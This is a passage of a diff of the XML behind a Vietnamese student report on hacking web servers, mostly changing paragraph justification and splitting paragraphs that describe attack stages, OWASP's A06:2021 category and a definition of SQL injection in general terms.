-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{9A817F79-9C7D-40AA-9C23-489E7E835771}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{597985DB-2B3A-4DE9-90AD-87B66510F085}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Hacking_Web_Server_Project.docx
+++ b/Hacking_Web_Server_Project.docx
@@ -5887,7 +5887,7 @@
         <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
         <w:ind w:left="792"/>
         <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="center"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
@@ -6211,7 +6211,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
@@ -6891,7 +6891,7 @@
               <w:spacing w:before="120" w:line="312" w:lineRule="auto"/>
               <w:ind w:left="0"/>
               <w:contextualSpacing w:val="0"/>
-              <w:jc w:val="center"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:b/>
@@ -6924,7 +6924,7 @@
               <w:spacing w:before="120" w:line="312" w:lineRule="auto"/>
               <w:ind w:left="0"/>
               <w:contextualSpacing w:val="0"/>
-              <w:jc w:val="center"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:b/>
@@ -6957,7 +6957,7 @@
               <w:spacing w:before="120" w:line="312" w:lineRule="auto"/>
               <w:ind w:left="0"/>
               <w:contextualSpacing w:val="0"/>
-              <w:jc w:val="center"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:b/>
@@ -6990,7 +6990,7 @@
               <w:spacing w:before="120" w:line="312" w:lineRule="auto"/>
               <w:ind w:left="0"/>
               <w:contextualSpacing w:val="0"/>
-              <w:jc w:val="center"/>
+              <w:jc w:val="both"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:b/>
@@ -7208,6 +7208,7 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -7230,6 +7231,7 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -7398,7 +7400,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:jc w:val="center"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -7411,6 +7413,7 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -7565,7 +7568,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:jc w:val="center"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -7578,6 +7581,7 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -7732,7 +7736,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:jc w:val="center"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -7745,6 +7749,7 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -7899,7 +7904,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:jc w:val="center"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -7912,22 +7917,24 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720" w:firstLine="504"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Sự tồn tại của hacker mũ trắng và các chuẩn mực như OWASP Top 10 đã tạo ra một "hệ sinh thái" an ninh mạ</w:t>
       </w:r>
       <w:r>
@@ -8041,6 +8048,7 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -8105,6 +8113,7 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="360" w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -8209,8 +8218,10 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
+          <w:noProof/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4718A15C" wp14:editId="574B73D5">
@@ -8257,6 +8268,19 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="360" w:firstLine="360"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360" w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -8316,7 +8340,28 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve">g tin. Tiếp theo, </w:t>
+        <w:t xml:space="preserve">g tin. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tiếp theo, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8343,7 +8388,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve">au khi đã có đủ thông tin, kẻ tấn công bắt đầu xâm nhập hệ thống bằng cách sử dụng các phần mềm độc hại (malware) hoặc khai thác các lỗ hổng bảo mật đã tìm thấy. Việc phát tán có thể thông qua email lừa đảo (phishing) hoặc các trang web bị </w:t>
+        <w:t xml:space="preserve">au khi đã có đủ thông tin, kẻ tấn công bắt đầu xâm nhập hệ thống bằng cách sử dụng các phần mềm độc hại (malware) hoặc khai thác các lỗ hổng bảo mật đã tìm thấy. Việc phát </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8353,16 +8398,37 @@
           <w:szCs w:val="26"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>xâm nhậ</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>p. Exploitation (Khai thác) là</w:t>
+        <w:t>tán có thể thông qua email lừa đảo (phishing) hoặc các trang web bị xâm nhậ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">p. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Exploitation (Khai thác) là</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8434,7 +8500,28 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve">i. Kế tiếp giai đoạn </w:t>
+        <w:t xml:space="preserve">i. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Kế tiếp giai đoạn </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8470,7 +8557,28 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve">ng sâu hơn.Giai đoạn </w:t>
+        <w:t>ng sâu hơn.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Giai đoạn </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8506,7 +8614,28 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve">ng khác. Tiếp đó giai đoạn </w:t>
+        <w:t xml:space="preserve">ng khác. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tiếp đó giai đoạn </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8542,7 +8671,46 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve">u tra pháp lý. Trước khi kết thúc kẻ tấn công tiến hành giai đoạn </w:t>
+        <w:t xml:space="preserve">u tra pháp lý. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Trước khi kết thúc</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kẻ tấn công tiến hành giai đoạn </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8596,7 +8764,28 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve">c tiêu.Cuối cùng </w:t>
+        <w:t>c tiêu.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Cuối cùng </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8656,6 +8845,7 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="360" w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -8822,6 +9012,7 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -9041,6 +9232,7 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -9084,6 +9276,7 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -9104,6 +9297,7 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -9167,6 +9361,7 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -9248,6 +9443,7 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -9311,6 +9507,7 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -9374,6 +9571,7 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -9385,13 +9583,23 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720" w:firstLine="504"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A06:2021-Vulnerable and Outdated Components (Các thành phần dễ bị tổn thương và lỗi thời): Lỗ hổng này tăng từ vị trí thứ 9 lên vị trí </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -9400,7 +9608,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">A06:2021-Vulnerable and Outdated Components (Các thành phần dễ bị tổn thương và lỗi thời): Lỗ hổng này tăng từ vị trí thứ 9 lên vị trí thứ 6, cho thấy sự phụ thuộc vào các thư viện bên thứ ba có thể là một điểm yếu nghiêm trọng nếu chúng không được cập nhật thường xuyên.  </w:t>
+        <w:t xml:space="preserve">thứ 6, cho thấy sự phụ thuộc vào các thư viện bên thứ ba có thể là một điểm yếu nghiêm trọng nếu chúng không được cập nhật thường xuyên.  </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9449,6 +9657,7 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -9729,9 +9938,10 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
+          <w:noProof/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58DD10FD" wp14:editId="55E26A0D">
@@ -9778,155 +9988,15 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="120" w:after="0" w:line="288" w:lineRule="auto"/>
-        <w:ind w:left="720" w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>SQL Injection là một kỹ thuật tấn công cho phép kẻ tấn công lợi dụng những lỗ hổng trong quá trình kiểm tra và lọc dữ liệu đầu vào của các ứng dụng web</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"nckQkNuU","properties":{"formattedCitation":"[13]","plainCitation":"[13]","noteIndex":0},"citationItems":[{"id":148,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/4SWAVXRW"],"itemData":{"id":148,"type":"webpage","title":"SQL Injection","URL":"https://viblo.asia/p/sql-injection-MgNeWWbKeYx","accessed":{"date-parts":[["2025",10,4]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-        </w:rPr>
-        <w:t>[13]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>. Bằng cách "tiêm" (inject) các câu lệnh SQL bất hợp pháp thông qua các form nhập liệu, kẻ tấn công có thể thực thi các truy vấn không mong muốn trên cơ sở dữ liệu, thậm chí trên cả máy chủ đang chạy ứng dụng đó</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"2q7c6erP","properties":{"formattedCitation":"[14]","plainCitation":"[14]","noteIndex":0},"citationItems":[{"id":151,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/4Y4SUFZT"],"itemData":{"id":151,"type":"webpage","abstract":"Read this practical technical guide about the 5 most common SQL injection attacks and how to prevent them. It packs real-life examples, mitigation steps &amp; more!","container-title":"Pentest-Tools.com","language":"vi","title":"Breaking down the 5 most common SQL injection attacks","URL":"https://pentest-tools.com/blog/sql-injection-attacks","accessed":{"date-parts":[["2025",10,4]]},"issued":{"date-parts":[["2024",4,29]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-        </w:rPr>
-        <w:t>[14]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
